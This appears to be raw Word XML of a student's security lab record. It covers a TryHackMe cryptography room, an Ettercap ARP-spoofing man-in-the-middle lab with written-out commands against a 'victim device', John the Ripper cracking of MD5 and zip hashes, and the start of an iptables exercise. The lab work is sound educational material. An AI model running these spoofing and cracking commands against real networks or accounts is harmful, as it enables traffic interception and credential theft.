    <w:p w14:paraId="64B09E5A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6B7C1DA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Step 2: Open Crypto 101 Room</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3294BC43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In the search bar, type Crypto 101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0717AE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Click on the room named Crypto 101</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2430A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3.</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Click Join Room</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6C14BE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5BAF19A9" w14:textId="77777777" w:rsidR="00CE2C37" w:rsidRDefault="00CE2C37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664AA31" w14:textId="06253000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lastRenderedPageBreak/>
        <w:t>Step 3: Start the Machine (if required)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE20CAB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 xml:space="preserve">Click Start Machine / Start </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AttackBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="010CC10F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Wait for the virtual environment to load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6157141F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4ABC187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Step 4: Perform Cryptography Tasks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2C3C4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Complete the tasks provided in the room, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38120AC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4.1 Encoding &amp; Decoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27351020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(a) Base64 Encoding / Decoding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B85133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298825F6" w14:textId="67252834" w:rsidR="00CE2C37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Base64 is an encoding technique used to represent binary data in readable ASCII format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E78BA2A" w14:textId="77777777" w:rsidR="00CE2C37" w:rsidRPr="000F4FFB" w:rsidRDefault="00CE2C37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191A5A88" w14:textId="230FC576" w:rsidR="00CE2C37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3B59DCDC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To Decode Base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E360358" w14:textId="677841EF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Copy the given Base64 string from the question.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CF7D37" w14:textId="0B8649FD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 xml:space="preserve">Open the </w:t>
      </w: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terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5803A53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3.</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Use the command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170AC29F" w14:textId="4BEFED3E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echo "Q3J5cHRvZ3JhcGh5" | base64 -d</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9DD57A" w14:textId="4E6D4EBF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4.</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>The output will be the decoded plain text.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B5407D3" w14:textId="2F17003B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5.</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Enter the decoded text into the answer box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BCD543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To Encode Base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381D1A44" w14:textId="188A9F33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echo "cryptography" | base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F856FF4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Expected Output Example:  Cryptography</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D24C7E5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39BDC8A" w14:textId="77777777" w:rsidR="00835F24" w:rsidRDefault="00835F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17157762" w14:textId="11AE37B5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lastRenderedPageBreak/>
        <w:t>(b) Hexadecimal Conversion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D91A040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46BD9330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Hexadecimal is a base-16 encoding system commonly used in computing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01621959" w14:textId="77777777" w:rsidR="00835F24" w:rsidRDefault="00835F24" w:rsidP="00835F24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71C46D67" w14:textId="35E7317B" w:rsidR="000F4FFB" w:rsidRPr="00CE2C37" w:rsidRDefault="000F4FFB" w:rsidP="00835F24">
      <w:pPr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17A607E0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Hex to Text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5788CEC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echo 48656c6c6f | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>xxd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-r -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7FE691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Text to Hex</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BD3805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echo "Hello" | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>xxd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-p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2FF25F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CE2C37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Expected Output:</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">  Hello</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C720B5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3E2ADB5B" w14:textId="77777777" w:rsidR="000F4FFB" w:rsidRPr="00835F24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835F24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Classical Ciphers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2E138B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3BB07B09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(a) Caesar Cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6CE34E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78591BC5" w14:textId="77777777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Caesar cipher shifts letters by a fixed number.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7344C87D" w14:textId="77777777" w:rsidR="00CE2C37" w:rsidRPr="000F4FFB" w:rsidRDefault="00CE2C37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0D8B5F43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3C4F551D" w14:textId="30CC4EDC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Identify the shift value (given or by trial).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8111BA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Use online Caesar decoder or terminal tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5491DE64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7B0D89A7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Using terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CAE3E1A" w14:textId="28FA13AF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echo "KHOOR" | tr 'A-Z' 'X-ZA-W'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739164A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(Shift = 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD03D28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Expected Output:  HELLO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC6E831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7ABC7982" w14:textId="77777777" w:rsidR="00835F24" w:rsidRDefault="00835F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5FC696A3" w14:textId="2B7320C2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lastRenderedPageBreak/>
        <w:t>(b) Shift-Based Encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608DC859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3A4BF611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Similar to Caesar cipher but may use different shift values.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2BCE0F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1ABFD55E" w14:textId="1CD1D82C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Try different shift values until meaningful text appears.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C692AD9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Online tools can be used if allowed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B50002B" w14:textId="77777777" w:rsidR="00835F24" w:rsidRDefault="00835F24" w:rsidP="00835F24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3112622C" w14:textId="5FA86C4F" w:rsidR="000F4FFB" w:rsidRPr="00835F24" w:rsidRDefault="000F4FFB" w:rsidP="00835F24">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE2C37">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A39016F" w14:textId="6C0CC301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●</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Shift 1 → incorrect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B528EB2" w14:textId="47F8B3D9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●</w:t>
      </w:r>
      <w:r w:rsidRPr="000F4FFB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:tab/>
        <w:t>Shift 3 → readable text → correct answer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="123D8695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39C5C09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293A5E84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50EB4F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F1656E5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EB0B46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CF1FB6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1E6C7BB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47F657B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6AF0A6D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A06C168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DC23C1D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7EF1F7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69567F3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9C1AD9A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49D4549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3D62B2F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CF744DD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D6CEFB0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16550C7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3713921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9BFEA30" w14:textId="66D8BA55" w:rsidR="00835F24" w:rsidRPr="000F4FFB" w:rsidRDefault="00835F24" w:rsidP="000F4FFB">
      <w:pPr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00835F24">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RESULT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Thus</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> the Encryption 101 room has been successfully completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BD573E" w14:textId="77777777" w:rsidR="000F4FFB" w:rsidRPr="000F4FFB" w:rsidRDefault="000F4FF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05FDDA1F" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="6B40831A" w14:textId="71307A12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6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="24F27EF9" w14:textId="40FE58AC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MAN-IN-THE-MIDDLE (MITM) ATTACKS USING THE ETTERCAP TOOL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835F24" w14:paraId="55DDEB64" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="76A58B8F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47E7E4E9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6459124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46C502E" w14:textId="3D9C48F3" w:rsidR="00F44251" w:rsidRDefault="00835F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>To perform network reconnaissance and Man-in-the-Middle attack setup using network commands and packet capturing tools in Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4CC809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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EA2B425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COMMANDS AND OUTPUT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E5D61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1. Checking Network Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46532AB7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7F9A79B5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ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="643C13AE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6FCBEF06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eth0: flags=4163&lt;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>UP,BROADCAST</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>RUNNING,MULTICAST</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9D99D5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10.0.2.15  netmask</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 255.255.255.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22238CD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8E010AA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Viewing Routing Table</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EC38CD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3F4BF1A8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 -n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F82840F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2D111EF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Destination   Gateway       </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Genmask</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="04DE030A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0.0.0.0       192.168.1.1   0.0.0.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54273C2C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03C3DE7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21F7932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C79486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3DCA74F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3. Discovering Network Devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030B6B8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6827D342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netdiscover</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5AE068F0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6E26A77C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192.168.1.1     Router</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF43A4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192.168.1.10    Victim Device</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436BB358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192.168.1.5     Kali Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CC07B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F51D685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4. Enabling IP Forwarding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="119F85A2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2FD65F1C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1 &gt; /proc/sys/net/ipv4/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ip_forward</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4E0B850B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2AFBE8F7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(No output)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2509C6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30F4B3B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Performing ARP Spoofing using Ettercap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369E6112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74FECC3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ettercap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> -T -q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eth0 -M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arp:remote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/192.168.1.10/ /192.168.1.1/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DED9AFE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4F5FFEE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ARP poisoning victims:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C1DA47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GROUP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>1 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17DF95C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GROUP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>2 :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> 192.168.1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7781F823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Starting Unified sniffing...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501958CA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77023C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41AA1A7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6. Capturing Network Packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB85B6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37979985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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE95D0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0CA1D977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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38206580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 192.168.1.10 &gt; google.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE2ACFA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 google.com &gt; 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C12C59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7340D39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EC20D8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4CFD8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964EFC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0F842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0C63A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619F7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30B1DE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244652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AAAC3A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E1165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0E5849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5DC774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1B98C4C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64833AC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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">The network configuration was verified, devices in the local network were discovered, IP forwarding was enabled, ARP spoofing was performed using Ettercap, and packets were successfully captured using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E33F084" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="3797250E" w14:textId="7187D47F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6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="3C7561C1" w14:textId="4D3EE7EA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DEMONSTRATE HASH CRACKING USING JOHN THE RIPPER TOOL.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835F24" w14:paraId="6FEBEF20" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="299EFC21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33B4159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346D87D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18E2AF1" w14:textId="494195E9" w:rsidR="00F44251" w:rsidRDefault="00835F24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>To perform password cracking using John the Ripper and understand hash identification and cracking techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7612466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3624C38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COMMANDS AND OUTPUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6CE1B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Checking John the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1CDA2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--version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE95FA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00896C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directory: /home/kali</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>/.john</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="048D918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Unknown option: "--version"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4614F98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DB68CB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Running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John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the Ripper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3FF61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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63D05BA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B59995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the Ripper 1.9.0-jumbo-1+bleeding-aec1328d6c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475D9AB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Usage: john [OPTIONS] [PASSWORD-FILES]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D054A1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EF7B4C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Extracting wordlist</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE0576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gunzip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">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/share/wordlists/rockyou.txt.gz</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C86853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FB0F3E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Creating MD5 hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328ADBB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-n "password123" | md5sum | awk '{print $1}' &gt; hash1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141B9E5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2959B6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076F88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F28816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5. Identifying hash type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF80AC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hashid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C34CE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469885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Analyzing '482c811da5d5b4bc6d497ffa98491e38'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9F5BD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[+] MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9283A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[+] MD4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D2250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[+] NTLM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E3DC6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...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A8A56D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833767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Cracking MD5 hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5955834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--format=raw-md5 --wordlist=/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 hash1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409A543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B9ECEB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Loaded 1 password hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="166D873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password123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EA2F1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 completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1C54F9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2F4BE5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Displaying cracked password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3236A69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--show --format=raw-md5 hash1.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A27F8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7602EAC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?:</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>password123</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F5CFFF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93965A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Creating a protected zip file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FD360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"secret info" &gt; secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320E37C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zip -e secure.zip secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667FB97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4CFA1B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adding: secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3200324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C96059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9. Extracting zip hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3261615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zip2john secure.zip &gt; zip_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE077F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A66F00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secure.zip/secret.txt PKZIP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Encr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1350A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20ADAA8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10. Cracking zip password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557348C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--wordlist=/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 zip_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42BAF94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9F987C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apple (secure.zip/secret.txt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14DAFAF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 completed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD9CFFC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20CC79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Showing cracked zip password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F52E6C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--show zip_hash.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6BDC6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56F2FDC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secure.zip/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>secret.txt:apple</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="42FFD65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BCF009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F56FFD7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7A1CA86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4E3546B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02A494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3149789E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AA500B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571A4D77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71AC34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8C1FD4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 The given password hashes were successfully identified and cracked using John the Ripper. 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CA687A7" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2475" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
          </w:tcPr>
          <w:p w14:paraId="09FEB62C" w14:textId="02EFEE5F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</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6840" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="0B9F6306" w14:textId="4CC13C95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VARIOUS CONFIGURATIONS OF IPTABLES FIREWALL IN LINUX.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00835F24" w14:paraId="115A27C9" w14:textId="77777777" w:rsidTr="00902553">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="985" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1BAF023E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3F5B8C0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4BD6861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670B44" w14:textId="4AB4F5A1" w:rsidR="00F44251" w:rsidRDefault="00835F24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>To configure a firewall in Kali Linux using iptables by setting rules and policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2327E26F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C266EA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COMMANDS AND OUTPUT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7970BF1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Listing current firewall rules</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755F797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6AC3DFB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776A315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**Chain INPUT (policy ACCEPT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF3C9D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06934B6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BC0390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FORWARD (policy ACCEPT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7859C65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271B0C4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3B24E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OUTPUT (policy ACCEPT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A7CDD8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destination**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234C520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F2938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Flushing existing rules</w:t>
      </w:r>
    </w:p>
